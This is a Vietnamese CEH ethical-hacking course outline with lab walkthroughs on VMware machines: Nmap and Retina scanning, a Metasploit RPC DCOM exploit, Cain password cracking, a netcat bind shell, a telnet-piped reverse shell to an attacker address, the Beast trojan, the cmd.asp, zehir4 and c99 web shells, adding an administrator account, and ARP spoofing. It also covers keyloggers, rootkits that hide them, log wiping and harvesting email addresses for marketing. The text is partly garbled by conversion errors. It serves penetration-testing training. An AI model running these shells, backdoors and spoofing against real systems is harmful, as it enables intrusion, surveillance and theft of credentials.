Đề Cương Tài Liệu Hướng Dẫn Kiểm Tra An Ninh Toàn Và Xâm Nhập Mạng.docx

Giáo trình bài tập CEH Tài liệu dành cho học viên Đề cương tài liệu hướng dẫn Kiểm tra an ninh toàn và xâm nhập mạng Mục Lục Mục Lục 1 Bài 1 FOOTPRINTING 4 I/ Giới thiệu về Foot Print 4 II/ Các bài th[.]

Tìm thông tin về Domain

Ta vào trang ww w w ho i s n e t để tìm kiếm thông tin và đánh vào domain mình muốn tìm kiếm thông tin

Sau đó ta nhận được thông tin như sau:

Registrar Whois : whois.bluehost.com

Registrar Homepage: http://www.bluehost.com/

Ngoài việc tìm thông tin về domain như trên, chúng ta có thể sử dụng các tiện ích Reverse IP domain lookup để có thể xem thử trên IP của mình có bao nhiêu host chung với mình Vào link sau đây để sử dụng tiện ích này. ht tp:/ /www domai ntools.c om/re verse -ip/

Việc tìm kiếm được thông tin này rất cần thiết với Hacker, bởi vì dựa vào thông tin sử dụng chung Server này, Hacker có thể thông qua các Website bị lỗi trong danh sách trên và tấn công vào Server từ đó kiểm soát tất cả các Website được hosting trên Server.

Tìm thông tin email

Trong bài thực hành này, chúng ta sử dụng phần mềm “1st email address spider” để tìm kiếm thông tin về các email Hacker có thể sử dụng phần mềm này để thu thập thêm thông tin về mail, hay lọc ra các đối tượng email khác nhau, tuy nhiên bạn có thể sử dụng tool này để thu thập thêm thông tin nhằm mục đích marketing, ví dụ bạn cần tìm thông tin của các email có đuôi là @vnn.vn hay @hcm.vnn.vn để phục cho việc marketing sản phẩm.

Ta có thể cấu hình việc sử dụng trang web nào để lấy thông tin, trong bài tôi sử dụng trang google.com để tìm kiếm.

Sau đó đánh từ khóa vnn.vn vào tag keyword

Sau đó chúng ta đã có được 1 list mail nhờ sử dụng trương trình này.

Scanning hay còn gọi là quét mạng là bước không thể thiếu được trong quá trình tấn công vào hệ thống mạng của hacker Nếu làm bước này tốt Hacker sẽ mau chóng phát hiện được lỗi của hệ thống ví dụ như lỗi RPC của Window hay lỗi trên phầm mềm dịch vụ web như Apache v.v Và từ những lỗi này, hacker có thể sử dụng những đoạn mã độc hại(từ các trang web) để tấn công vào hệ thống, tồi tệ nhất lấy shell.

Phần mềm scanning có rất nhiều loại, gồm các phầm mềm thương mại như Retina, GFI, và các phần mềm miễn phí như Nmap,Nessus Thông thường các ấn bản thương mại có thể update các bug lỗi mới từ internet và có thể dò tìm được những lỗi mới hơn Các phần mềm scanning có thể giúp người quản trị tìm được lỗi của hệ thống, đồng thời đưa ra các giải pháp để sửa lỗi như update Service patch hay sử dụng các policy hợp lý hơn.

II/ Các Bài thực hành

Bài thực hành 1: Sử dụng Phần mềm Nmap

Trước khi thực hành bài này, học viên nên tham khảo lại giáo trình lý thuyết về các option của nmap.

Chúng ta có thể sử dụng phần mềm trong CD CEH v5, hay có thể download bản mới nhất từ website: ww w i n s ecu r e or g Phần mềm nmap có 2 phiên bản dành cho Win và dành cho Linux, trong bài thực hành về Nmap, chúng ta sử dụng bản dành cho Window. Để thực hành bài này, học viên nên sử dụng Vmware và boot từ nhiều hệ điều hành khác nhau như Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.

Trước tiên sử dụng Nmap để do thám thử xem trong subnet có host nào up và các port các host này mở, ta sử dụng lệnh Nmap –h để xem lại các option của Nmap, sau đó thực hiện lệnh

“Nmap –sS 10.100.100.1-20” Và sau đó được kết quả sau:

C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

3389/tcp open ms-term-serv

1025/tcp open NFS-or-IIS

Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support scanning your own machine (localhost) this way All 0 scanned ports on 10.100.100.13 are

Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds

Trong mạng có tất cả 7 host, 6 máy Vmware và 1 PC DELL Bây giờ bước tiếp theo ta tìm kiếm thông tin về OS của các Host trên bằng sử dụng lệnh “ Nmap –v -O ip address”

C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tiết Nmap quét)

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard

Initiating ARP Ping Scan at 10:46

Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host at 10:46

Completed Parallel DNS resolution of 1 host at 10:46, 0.01s elapsed

Initiating SYN Stealth Scan at 10:46

Discovered open port 1025/tcp on 10.100.100.7

Discovered open port 445/tcp on 10.100.100.7

Discovered open port 135/tcp on 10.100.100.7

Discovered open port 139/tcp on 10.100.100.7

Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)

Initiating OS detection (try #1) against 10.100.100.7

Host 10.100.100.7 appears to be up good Interesting ports on 10.100.100.7:

1025/tcp open NFS-or-IIS

MAC Address: 00:0C:29:95:A9:03 (VMware) Device type: general purpose

OS details: Microsoft Windows 2003 Server SP1

OS:SCAN(V=4.20%D=8/2%OT5%CT=1%CU6092%PV=Y%DS=1%G=Y

OS:3%P=i686-pc-windows- windows)SEQ(SP%GCD=1%ISRA%TI=I%II=I%SS=S

OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS

OS:0NNS%O5=M5B4NW0NNT00NNS

OS:AF0%W50%W60)ECN(R=Y%DF=N%T%W0%O=M5B4NW0NN S

OS:%DF=N%T%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T%W=0%S=Z

%T%TOS=0%IPL%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G

%RUD=G)IE(R=Y%DFI=S%T%TOSI=Z%CD=Z%SI=S%

TCP Sequence Prediction: Difficulty%5 (Good luck!) IPID Sequence Generation: Incremental

OS detection performed Please report any incorrect results at http://insecure.o rg/nmap/submit/

Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds

Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)

Ta có thể xem các figerprinting tại “ C:\Program Files\Nmap\nmap-os-fingerprints”

Tiếp tục với những máy còn lại.

C:\Documents and Settings\anhhao>nmap -O 10.100.100.1

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard Time

Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)

OS detection performed Please report any incorrect results at http://insecure.org/nmap/submit/

Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds

Tuy nhiên có 1 số host Nmap không thể nhận diện ra như sau:

C:\Documents and Settings\anhhao>nmap -O 10.100.100.16

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard Time

Interesting ports on 10.100.100.16: Not shown: 1689 closed ports

No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).

OS:SCAN(V=4.20%D=8/2%OT!%CT=1%CU5147%PV=Y%DS=1%G=Y

OS:%P=i686-pc-windows- windows)SEQ(SPGCD=2%ISRC%TI=I%II=I%SS=S

OS:EQ(SPGCD=1%ISRC%TI=I%II=I%SS=S

%TS=0)OPS(O1=M5B4NW0NNT00NNS%O2=M5B OS:4NW0NNT00NNS

%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4NW0NNT00NNS%O6=M5 OS

:B4NNT00NNS)WIN(W10%W20%W30%W40%W50%W60 )ECN(R=Y%D OS:F=Y%T%W0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y

OS:%Q=)T2(R=Y%DF=N%T%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y% DF=Y%T%W0

OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N

%T%W=0%S=A%A=O%FOS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T%W=0%S=Z%A=S+%F=AR%O%RD=0%Q=)T6(R=Y%DF=N%T OS:%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y

%DF=N%T%W=0%S=Z%A=S+%F=AR%O=%RDOS:0%Q=)U1(R=Y%DF=N%T%TOS=0%IPL8%UN=0%RIPL=G%RID=G%RIPCK=G

%RUCK=G%RUL= OS:G%RUD=G)IE(R=Y%DFI=S%T%TOSI=S%CD=Z%SI=S

OS detection performed Please report any incorrect results at http://insecure.o rg/nmap/submit/ Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds

Tuy nhiên ta có thể nhận diện rằng đây là 1 Server chạy dịch vụ SQL và Web Server, bây giờ ta sử dụng lệnh “ Nmap –v –p 80 sV 10.100.100.16” để xác định version của IIS.

C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard

80/tcp open http Microsoft IIS webserver 5.0

MAC Address: 00:0C:29:D6:73:6D (VMware) Service Info: OS: Windows

Service detection performed Please report any incorrect results at http://insec ure.org/nmap/submit/

Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds

Vậy ta có thể đoán được phần nhiều host là Window 2000 Server Ngoài việc thực hành trên chúng ta có thể sử dụng Nmap trace, lưu log v.v

Bài thực hành thứ 2: Sử dụng phần mềm Retina để phát hiện các vulnerabilities và tấn công bằng Metaesploit framework.

Retina của Ieye là phần mềm thương mại(cũng như GFI, shadow v.v ) có thể update các lỗ hỗng 1 cách thường xuyên và giúp cho người Admin hệ thống có thể đưa ra những giải pháp để xử lý.

Bây giờ ta sử dụng phần mềm Retina để dò tìm lỗi của máy Win 2003 Sp0 (10.100.100.6)

Report từ chương trình Retina:

The following is an overview of the top 20 vulnerabilities on your network.

2 ASN.1 Vulnerability Could Allow Code Execution 1

5 No Remote Registry Access Available 1

8 Windows RPC Cumulative Patch 828741 Remote 1

9 Windows RPC DCOM interface buffer overflow 1

10 Windows RPC DCOM multiple vulnerabilities 1

13 Apache mod_alias and mod_rewrite Buffer Overflow 1

The following is an overview of the top 20 open ports on your network.

Rank Port Number Description Count

4 TCP:17 QOTD - Quote of the Day 1

7 TCP:42 NAMESERVER / WINS - Host Name Server 1

8 TCP:53 DOMAIN - Domain Name Server 1

9 TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text

10 TCP:135 RPC-LOCATOR - RPC (Remote Procedure Call) Location

11 TCP:139 NETBIOS-SSN - NETBIOS Session Service 1

12 TCP:445 MICROSOFT-DS - Microsoft-DS 1

16 TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1

17 TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1

18 TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 1

19 TCP:8080 Generic - Shared service port 1

The following is an overview of the top 20 operating systems on your network.

Rank Operating System Name Count

Như vậy ta đã xác định hệ điều hành của máy 10.100.100.6, các Port mở của hệ thống và các lỗi của hệ thống Đây là thông tin cần thiết để người Admin nhận diện lỗi và vá lỗi Trong Top 20 vulnerabilities ta sẽ khai thác bug lỗi thứ 10 là RPC DCOM bằng chương trinh Metaesploit framework(CD CEH v5) Ta có thể kiểm tra các thông tin lỗi này trên chính trang của Ieye hay securityfocus.com, microsoft.com.

Ta sử dụng giao diện console của Metaesploit để tìm bug lỗi hợp với chương trình

Ta thấy có thể nhận thấy bug lỗi msrpc_dcom_ms03_026.pm được liệt kê trong phần exploit của metaesploit Bây giờ ta bắt đầu khai thác lỗi này.

Như vậy sau khi khai thác ta đã có được shell của máy Win 2003, bây giờ ta có thể upload backdoor hay lấy những thông tin cần thiết trong máy này(vấn đề này sẽ được bàn ở những chương sau).

Kết luận: Phần mềm scanning rất quan trọng với Hacker để có thể phát hiện lỗi của hệ thống, sau khi xác định lỗi Hacker có thể sử dụng Framework có sẵn hay code có sẵn trên Internet để có thể chiếm quyền sử dụng của máy mục tiêu Tuy nhiên đây cũng là công cụ hữu ích của Admin hệ thống, phần mềm này giúp cho người Admin hệ thống đánh giá lại mức độ bảo mật của hệ thống mình và kiểm tra liên tục các bug lỗi xảy ra.

Như chúng ta đã học ở phần lý thuyết, Module System Hacking bao gồm những kỹ thuật lấy Username và Password, nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin của đối phương(trong bước này cũng có thể Hacker để lại Trojan, vấn đề học ở chương tiếp theo), ẩn thông tin của process đang hoạt động(Rootkit), và xóa những log hệ thống. Đối với phần lấy thông tin về username và password Local, hacker có thể crack pass trên máy nội bộ nếu sử dụng phần mềm cài lên máy đó, hay sử dụng CD boot Knoppix để lấy syskey, bước tiếp theo là giải mã SAM để lấy hash của Account hệ thống Chúng ta có thể lấy username và password thông qua remote như SMB, NTLM(bằng kỹ thuật sniffer sẽ học ở chương sau) hay thông qua 1 Account đã của hệ thống đã biết (sử dụng PWdump3)

Với phần nâng quyền trong hệ thống, Hacker có thể sử dụng lỗ hỗng của Window, các phần mềm chạy trên hệ thống nhằm lấy quyền Admin điều khiển hệ thống Trong bài thực hành ta khai thác lỗ hổng của Kaberky Lab 6.0 để nâng quyền từ user bình thường sang user Administrator trong Win XP sp2.

Phần Keylogger ta sử dụng SC-keyloger để xem các hoạt động của nạn nhân như giám sát nội dung bàn phím, thông tin về chat, thông tin về sử dụng máy, thông tin về các tài khoản user sử dụng.

Tiếp theo ta sử dụng Rootkit để ẩn các process của keyloger, làm cho người admin hệ thống không thể phát hiện ra là mình đang bị theo dõi Ở bước này ta sử dụng vanquis rootkit để ẩn các process trong hệ thống Cuối cùng ta xóa log và dấu vết xâm nhập hệ thống.

II/ Thực hành các bài Lab

Bài Lab 1: Crack password nội bộ

Trước tiên ta cài phầm mềm Cain vào máy đối phương, và sử dụng phần mềm này để dò tìm password của user.

Bật phầm mềm Cain và chọn Import Hashes from local system Ở đây chúng ta thấy có 3 chế độ, “ Import hash from local system”, ta sử dụng file

Sử dụng netcat

1/Sử dụng netcat để kết nối shell

Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn l – (listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe (đối với NT) hoặc bin/sh (đối với Unix).

E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error

- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp.

Volume in drive E has no label

[.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe

C:\test>exit exit sent 20, rcvd 450: NOTSOCK

Bây giờ chúng ta đã có được shell và kiểm soat được máy nạn nhân.Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũngđóng luôn Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thaycho -l Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.

2/Sử dụng netcat để kết nối shell nghịch chuyển để by pass Firewall:

- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia.

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:

C:\>nc -nvv -l -p 80 listennng on [any] 80 connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la

C:\>nc -nvv -l -p 25 listening on [any] 25 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056

/ total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 drwxr-xr-x 17 root root 4096 Feb 5 16:15 drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx - 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (²?n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25

/bin/sh: Trying: command not found

/bin/sh: Connected: command not found

/bin/sh: Escape: command not found

Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat

(1) - cổng 80 kết xuất sang cho /bin/sh thi hành Kết quả của

/bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat

(2) - cổng 25 Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.

Sử dụng Trojan Beast và detect trojan

Muốn sử dụng Trojan Beast, ta cần phải xây dụng 1 file Server cài lên máy nạn nhân, sau đó file server này sẽ lắng nghe ở những port cố định và từ máy tấn công ta sẽ connect vào máy nạn nhân thông qua cổng này.

Chọn trojan Beast trong đĩa CD và chạy file tạo trojan.

Ta có thể sử dụng thêm các tính năng như AV-FW kill để tắ Firewall trên máy đối phương, hoặc inject vào 1 file khác như notepad.exe, explore dưới dạng dll Ta sử dụng button Save Server để tại ra file server.exe và chạy file ở máy nạn nhân và kiểm tra trên taskmanager của máy nạn nhân xem Trojan đã thực sự hoạt động.

Bây giờ ta sử dụng chương trình tại máy tấn công để connect vào file Server đã chạy trên máy của nạn nhân.

Ta thử sử dụng 1 số tính năng như là managers file để download các file mình cần tại máy nạn nhân, hay bạn có shutdown, reboot máy nạn nhân thông qua tính năng của tag

Cách phòng chống: Ngoài cách sử dụng các chương trình Anti Virus và Trojan, ta có thể dựa và tính chất thông thường những Trojan này bắt buộc phải mở port nào đó ra ngoài, ta có thể xem bằng chương trình Curr Port hay chương trình fport.

Dựa vào thông tin Currport cung cấp ta có thể xóa đường dẫn của file cehclass.exe và xóa những thông tin về nó trong regedit, và startup v.v.

Sử dụng Trojan dưới dạng Webbase

Trojan dạng webbase thông thường phổ biến hơn trong môi trường web, sau khi hacker khai thác được lỗ hỗng và chiếm quyền sử dụng Web Server, hacker sẽ để lại trojan dưới dạng Webbase và thông qua Trojan này hacker có thể ra vào hệ thống cho những lần sau. Đặc điểm của loại Trojan này là rất khó phát hiện, vì no chạy dưới dạng Web và sử dụng những hàm truy suất hệ thống thông qua các ngôn ngữ asp, phpv.v, vì vậy nó không thể dễ phát hiện như loại trojan kết nối như netcat, beast v.v. Để thực hiện bài lab này trước tiên ta phải cài đặt Web Server gồm IIS và Apache.

1/Trojan dưới dạng Web với ngôn ngữ ASP: Ta sử dụng Web Server IIS với Trojan được viết bằng ngôn ngữ này, người viết giới thiệu với các bạn 2 trojan tiêu biểu là cmd.asp và zehir4.asp Đầu tiên bạn cài đặt dịch vụ Web IIS(việc cài đặt khá đơn giản, học viên có thể tự mình làm phần này), chép 2 file vào thư mục www để truy cập thông qua Web.

Ta đánh vào lệnh Dir để xem thông tin các file trong hệ thống, với trojan như trên ta có thể xem được các thông tin hệ thống, có thể upload,download thông qua tftp, và add user vào hệ thống ví dụ lệnh “ net user hao hao /add”, “net Localgroup administrators hao /add “.

Vào link htt p:// 192 168 1 116/ ze hi r4.a sp để xem về trojan webbase thứ 2.

Ta thấy Trojan này hướng đồ họa và tiện dụng hơn, việc lấy file,xóa file hoàn toàn thông qua web, chúng ta có thể dễ dàng thao tác trên máy của nạn nhân.

2/Trojan với ngôn ngữ PHP: Ta sử dụng Web server Apache với trojan được viết bằng ngôn ngữ này, người viết giới thiệu đến các bạn trojan tiêu biểu là c99. Đầu tiên bạn sử dụng chương trình phpeasy để cài kết hợp 3 gói sau apache, php, và mysql. Tuy nhiên trong bài các bạn chỉ cần sử dụng php và apache Chép các file trojan và thư mục www để có thể chạy được các file này. Đây là file trojan rất nguy hiểm, nó vừa có thể download, upload file, đồng thời hỗ trợ chúng ta chạy những úng dụng như perl, thực thi các hàm hệ thống, cung cấp thông tin về nạn nhân hiện hànhv.v Do tính chất như vậy cho nên Trojan này được hacker dùng rất rộng rãi(ngoài ra còn có r57, phpshellv.v).

CÁC PHƯƠNG PHÁP SNIFFER

TỔNG QUAN SNIFFER

Sniffer được hiểu đơn giản như là một chương trình cố gắng nghe ngóng các lưu lượng thông tin trên một hệ thống mạng.

Sniffer được sử dụng như một công cụ để các nhà quản trị mạng theo dõi và bảo trì hệ thống mạng Về mặt tiêu cực, sniffer được sử dụng như một công cụ với mục đích nghe lén các thông tin trên mạng để lấy các thông tin quan trọng Sniffer dựa vào phương thức tấn công ARP để bắt gói các thông tin được truyền qua mạng.

Tuy nhiên những giao dịch giữa các hệ thống mạng máy tính thường là những dữ liệu ở dạng nhị phân (binary) Bởi vậy để hiểu được những dữ liệu ở dạng nhị phân này, các chương trình Sniffer này phải có tính năng phân tích các nghi thức (Protocol Analysis), cũng như tính năng giải mã (Decode) các dữ liệu ở dạng nhị phân để hiểu được chúng Một số các ứng dụng củaSniffer được sử dụng như: dsniff, snort, cain, ettercap, sniffer pro…

HOẠT ĐỘNG CỦA SNIFFER

Sniffer hoạt động chủ yếu dựa trên dạng tấn công ARP.

1 Giới thiệu Đây là một dạng tấn công rất nguy hiểm, gọi là Man In The Middle Trong trường hợp này giống như bị đặt máy nghe lén, phiên làm việc giữa máy gởi và máy nhận vẫn diễn ra bình thường nên người sử dụng không hề hay biết mình bị tấn công

2 Sơ Lược Quá trình hoạt động

Trên cùng một mạng, Host A và Host B muốn truyền tin cho nhau, các Packet sẽ được đưa xuống tầng Datalink để đóng gói, các Host phải đóng gói MAC nguồn, MAC đích vào Frame. Như vậy trước khi quá trình truyền Dữ liệu, các Host phải hỏi địa chỉ MAC của nhau.

Nếu như Host A khởi động quá trình hỏi MAC trước, nó sẽ gởi broadcast gói tin ARP request cho tất cả các Host để hỏi MAC Host B, lúc đó Host B đã có MAC của Host A, sau đó Host B chỉ trả lời cho Host A MAC của Host B(ARP reply ).

Có 1 Host C liên tục gởi ARP reply cho Host A và Host B địa chỉ MAC của Host C, nhưng lại đăt địa chỉ IP là Host A và Host B Lúc này Host A cứ nghĩ máy B có MAC là C Như vậy các gói tin mà Host A gởi cho Host B đều bị đưa đến Host C, gói tin Host B trả lời cho Host

A cũng đưa đến Host C Nếu Host C bật chức năng forwarding thì coi như Host A và Host B không hề hay biết rằng mình bị tấn công ARP

Ta có mô hình gồm các host

Attacker: là máy hacker dùng để tấn công ARP

Victim: là máy bị tấn công

-Đầu tiên, HostA muốn gởi dữ liệu cho Victim, cần phải biết địa chỉ MAC của Victim để liên lạc HostA sẽ gởi broadcast ARP Request tới tất cả các máy trong cùng mạng

LAN để hỏi xem IP 10.0.0.12 (IP của Victim) có địa chỉ MAC là bao nhiêu.

-Attacker và Victim đều nhận được gói tin ARP Request, nhưng chỉ có Victim gởi trả lời gói tin ARP Reply lại cho HostA ARP Reply chứa thông tin về IP 10.0.0.12 và

-HostA nhận được gói ARP Realy từ Victim, biết được địa chỉ MAC của Victim là

0000.0000.1012 sẽ bắt đầu thực hiện liên lạc truyền dữ liệu đến Victim Attacker không thể xem nội dung dữ liệu được truyền giữa HostA và Victim

Máy Attacker muốn thực hiện ARP attack đối với máy Victim Attacker muốn mọi gói tin HostA gởi đến máy Victim đều có thể chụp lại được để xem trộm

-Attacker thực hiện gởi liên tục ARP Reply chứa thông tin về IP của Victim 10.0.0.12, còn địa chỉ MAC là của Attacker 0000.0000.1011.

-HostA nhận được ARP Reply nghĩ rằng IP Victim 10.0.0.12 có địa chỉ MAC là

0000.0000.1011 HostA lưu thông tin này vào bảng ARP Cache và thực hiện kết nối.

-Lúc này mọi thông tin, dữ liệu HostA gởi tới máy có IP 10.0.0.12 (là máy Victim) sẽ gởi qua địa chỉ MAC 0000.0000.1011 của máy Attacker.

CAIN (Sử dụng phần mềm CAIN)

1.Yêu cầu về phần cứng:

- hệ điều hành Win 2000/2003/XP

Giao diện chạy chương trình CAIN

Cain & Abel cần cấu hỡnh một vài thụng số, mọùi thứ cú thể được điều chỉnh thụng qua bảng Configuration dialog

-Tại đây chúng ta chọn card mạng sử dụng để tiến hành sniffer và tính năng APR Check vào ô Option để kích hoạt hay không kích hoạt tính năng.

-Sniffer tương thích với Winpcap version 2.3 hay cao hơn Version này hỗ trợ card mạng rất nhiều

APR t a b: Đây là nơi bạn có thể config ARP Mặc định Cain ngăn cách 1 chuỗi gửi gói ARP từ nạn nhân trong vòng 30 giây Đây thực sự là điều cần thiết bởi vì việc xâm nhập vào thiết bị có thể sẽ gây ra sự không lưu thông tính hiệu Từ dialog này bạn có thể xác định thời gian giữa mỗi lần thực thi ARP, xác định thông số ít sẽ tạo cho ARP lưu thông nhiều, ngược lại sẽ khó khăn hơn trong việc xâm nhập

Tại mục này, ta cần chú ý tới phần Spoofing Options:

+Mục đầu tiên cho phép ta sử dụng địa chỉ MAC và IP thực của máy mà mình dang sử dụng. +Mục thứ hai cho phép sử dụng một IP và địa chỉ MAC giả mạo (Lưu ý địa chỉ ta chọn phải không trùng với IP của máy khác)

Khi click vào tab filters and ports, ta sẽ thấy một số thông tin về giao thức và các con số port tương ứng với giao thức đó.

-Tại đây bạn có thể chọn kích hoạt hay không kích hoạt các port ứng dụng TCP/UDP

- Tại đây có 1 list danh sách username và password sử dụng được HTTP sniffer lọc lại.

- Tại tab này cho phép ta biết dược chương trình này sẽ bắt 1 số thông tin về trang web như:

+ Mục Username Fields: nó sẽ lấy thông tin những gì liên quan đến cái tên (user name, account, web name v.v )

+ Mục Password Fields: lanh vực này sẽ đãm nhiệm vai trò lấy thông tin về password (login password, user pass, webpass v.v…)

4 Các ứng dụng của CAIN:

Trước hết nó được sử dụng như 1 private key bảo mật một số vấn đề cho user Hầu hết thông tin trong Protected Storage được mã hóa.Sử dụng như 1 key nhận được từ việc logon password của user Cho phép điều hòa viêc truy cập thông tin để owner có thể an toàn truy xuất.

Một vài ứng dụng của Windows có nét đặc trưng nên sử dụng dịch vụ này: InternetExplorer, Oulook, Oulook Express

Nó cho phép bạn đưa user names và passwords cho 1 tài nguyên mạng khác và 1 ứng dụng,sau đó hệ thống tự động cung cấp thông tin về những sự viếng thăm thông tin mà bạn không can thiệp.

LSA secrets thì sử dụng thông tin password cho accounts dùng để start một dịch vụ khác dữ liệu cục bộ Dial Up và một số ứng dụng khác xác định password nằm ở đây

+ Giải mã password Dial-Up:

APR là nét đặc trưng chính của chương trình Nó cho phép lắng nghe về các mạng chuyển mạch và sự tấn công lưu thông IP giữa các host “APR poinsion routing” thực hiện: tấn công và định tuyến chính xác địa chỉ đích APR tấn công cơ bản thông qua thao tác của host ARP Trên 1 địa chỉ IP hay Ethernet khi mà 2 host muốn truyền tin lẫn nhau thì phải biết địa chỉ MAC addresses của nhau Host gốc thấy bảng ARP nếu mà ở đây có 1 MAC addresses tương ứng với địa chỉ IP addresses của nó Nếu không, nó là địa chỉ broadcasts,một lời yêu cầu ARP hỏi địa chỉ MAC của địa chỉ đích Bởi vì gói thông tin này được gửi trong miền broadcasts, nó sẽ đi đến những cái host cùng subnet, tuy nhiên host với IP address trên lý thuyết khi nhận được yêu cầu sẽ trả lời lại địa chỉ MAC gốc của nó Trái lại nếu ARP-IP tiếp cận địa chỉ đích của host thì nó sẵn sàng đưa ra soure host trên ARP cache Điều này sẽ được dùng để phát sinh lưu thông ARP

Cần chỉnh 1 vài thông số, điều này có thể thực hiện được bằng việc chỉ rõ việc bắt chước MAC và IP addresses bằng việc sử dụng ARP poision packets Điều này thật sự khó khăn khi không để lại vết tích của việc tấn công bởi vì người tấn công thực tế không bao giờ gửi địa chỉ qua lại trên mạng.Trên mạng người tấn công lúc nào cũng lén lúc ở giữa để quan sát

Hình ở trên là ta muốn tấn công ip từ 192.168.0.1 ( 192.168.0.10 Công việc tiến hành theo cơ chế Người ở giữa, chương trình sẽ thực hiện 1 sự tấn công ARP poision, CAIN có thể phát triển sự tấn công bộ nhớ Của nhiều host trong khoảng thời gian như nhau, bạn cần chọn 1 địa chỉ ở ô bên trái

+ Service manager: ta có thể start/stop,pause/continued hay remove bất cứ 1 dịch vụ nào có trên cửa sổ giao diện

ARP-DNS: Nét đặc trưng ở đây là cho phép DNS tiến hành giả mạo thành 1 DNS-reply để có thể tấn công.

SOCIAL ENGINEERING

Kỹ thuật lừa đảo (Social Engineering) là một thủ thuật được nhiều hacker sử dụng cho các cuộc thâm nhập vào các hệ thống mạng, máy tính Đây là một trong những phương thức hiệu quả để đánh cắp mật khẩu, thông tin, tấn công vào hệ thống.

